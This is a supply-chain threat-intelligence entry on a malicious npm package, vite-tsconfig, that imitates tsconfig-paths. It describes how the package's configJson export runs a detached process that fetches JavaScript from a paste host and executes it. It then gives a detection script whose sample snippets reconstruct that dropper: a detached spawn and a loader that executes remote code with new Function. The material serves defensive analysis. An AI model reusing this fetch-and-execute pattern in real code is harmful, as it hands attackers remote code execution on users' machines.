THREATPKG

Supply-chain threat intelligence

Incident detail

critical · npm · malware · osv

Malicious code in vite-tsconfig (npm)

vite-tsconfig

Risk score

92

AI summary

Indexed incident for vite-tsconfig (npm).

Description

The package is named vite-tsconfig and replicates the public API of the legitimate tsconfig-paths library (register, loadConfig, createMatchPath, matchFromAbsolutePaths), but adds an extra exported function, configJson, that is not present upstream.

When a consumer calls configJson(), lib/config-loader.js spawns a detached, stdio-suppressed child process running node lib/mapProps.js (child_process.spawn with detached: true, followed by child.unref()), so the caller can exit without waiting for it and none of its output reaches the caller's terminal. lib/mapProps.js then issues axios.get('https://www.jsonkeeper.com/b/5IZTJ') with the header x-secret-key: _, takes response.data.Cookie, and executes it as JavaScript with full Node capability via new Function('require', s)(require), retrying up to 5 times.

jsonkeeper.com is an anonymous public JSON paste host, so the executed payload is mutable and attacker-controlled: the publisher gets arbitrary remote code execution on any machine where a consumer invokes the documented configJson API, and because the payload is fetched at call time, the final stage cannot be recovered from the package tarball alone.

The remote URL is camouflaged as DEV_API_KEY inside a fake process.env shadow object, and the loader is wrapped in pino-logger-shaped config (messageKey/levels in lib/config-loader.js) to disguise the dropper. The README references vite-json and dividab/tsconfig-paths, confirming the impersonation framing.
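As an added example (not ThreatPkg tooling and not the package's own code), the following script shows the two checks a practitioner would run when triaging a package of this shape: diff its export surface against the upstream tsconfig-paths API named above, and scan its source text for the dropper indicators the description lists (detached, unref'd spawn; new Function('require', ...); a fetch to a paste host; a local shadow of process.env). The snippets it scans are constructed to imitate that shape and are not the real package files; the rule weights, the verdict threshold, the placeholder paste id and the assumption that the process.env shadow is built by redeclaring process locally are all this example's own.

```javascript
'use strict';

// Export surface of upstream tsconfig-paths as named on this page.
const UPSTREAM_TSCONFIG_PATHS_EXPORTS = [
  'register', 'loadConfig', 'createMatchPath', 'matchFromAbsolutePaths',
];

// Compare the export names a package actually exposes with the upstream
// set. An impersonator that is a strict superset (here: + configJson) is
// the first signal called out in the description above.
function diffExports(actualExports, expectedExports = UPSTREAM_TSCONFIG_PATHS_EXPORTS) {
  const actual = new Set(actualExports);
  const expected = new Set(expectedExports);
  return {
    extra: [...actual].filter((n) => !expected.has(n)).sort(),
    missing: [...expected].filter((n) => !actual.has(n)).sort(),
  };
}

// Source-text indicators keyed to the behaviours in the description.
// Weights are constructed triage weights for this example, not the
// ThreatPkg risk score. The process-shadow rule assumes the fake
// process.env is built by redeclaring `process` locally; the page does
// not show the exact form, so tune it against the real files.
const RULES = [
  { id: 'detached-spawn', weight: 3, re: /spawn\s*\([\s\S]*?detached\s*:\s*true/ },
  { id: 'child-unref', weight: 1, re: /\.unref\s*\(\s*\)/ },
  { id: 'stdio-suppressed', weight: 1, re: /stdio\s*:\s*['"]ignore['"]/ },
  { id: 'new-function-with-require', weight: 5, re: /new\s+Function\s*\(\s*['"]require['"]/ },
  { id: 'remote-fetch', weight: 2, re: /\baxios\.get\s*\(|\bfetch\s*\(\s*['"]https?:/ },
  { id: 'paste-host', weight: 4, re: /jsonkeeper\.com/ },
  { id: 'process-shadow', weight: 2, re: /\b(?:const|let|var)\s+process\s*=/ },
];

// Scan one file's text; returns the rule ids that fired and their summed weight.
function scanSource(code) {
  const fired = RULES.filter((r) => r.re.test(code));
  return {
    hits: fired.map((r) => r.id),
    score: fired.reduce((s, r) => s + r.weight, 0),
  };
}

// Combine the export diff and per-file findings into one verdict.
// The cut-off of 5 is a constructed threshold for this example.
function triagePackage({ exports, files }) {
  const exportDiff = diffExports(exports);
  const findings = Object.entries(files).map(([file, code]) => ({ file, ...scanSource(code) }));
  const totalScore = findings.reduce((s, f) => s + f.score, 0);
  const suspicious = totalScore >= 5 || (exportDiff.extra.length > 0 && totalScore > 0);
  return { exportDiff, findings, totalScore, verdict: suspicious ? 'suspicious' : 'clean' };
}

// Constructed snippets that imitate the shape described above. They are
// NOT the package's real contents; the paste id is a placeholder.
const CONSTRUCTED_DROPPER = `
const { spawn } = require('child_process');
function configJson() {
  const child = spawn('node', ['lib/mapProps.js'], { detached: true, stdio: 'ignore' });
  child.unref();
}
module.exports = { configJson };
`;

const CONSTRUCTED_LOADER = `
const axios = require('axios');
const process = { env: { DEV_API_KEY: 'https://www.jsonkeeper.com/b/XXXXX' } };
async function load() {
  const r = await axios.get(process.env.DEV_API_KEY, { headers: { 'x-secret-key': '_' } });
  new Function('require', r.data.Cookie)(require);
}
`;

// A legitimate build helper that also spawns a child, to show the rules
// do not fire on an ordinary, attached spawn.
const CONSTRUCTED_BENIGN = `
const { spawn } = require('child_process');
function typecheck() {
  const child = spawn('npx', ['tsc', '--noEmit'], { stdio: 'inherit' });
  return new Promise((resolve) => child.on('exit', resolve));
}
module.exports = { typecheck };
`;

function demo() {
  const report = triagePackage({
    exports: [...UPSTREAM_TSCONFIG_PATHS_EXPORTS, 'configJson'],
    files: { 'lib/config-loader.js': CONSTRUCTED_DROPPER, 'lib/mapProps.js': CONSTRUCTED_LOADER },
  });
  console.log(JSON.stringify(report, null, 2));
  return report;
}

demo();
```

The regexes are deliberately loose (the detached-spawn rule will pair a spawn call with a detached: true that appears later in the same file), which is the right trade-off for triage: the export diff and the new Function('require', ...) rule carry the weight, and the rest are there to explain a hit, not to prove one.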

Technical details

Affected versions

=1.1.0

Indicators

  • affected version = 1.1.0 (75%)

Timeline

  1. Advisory published
  2. Indexed by ThreatPkg
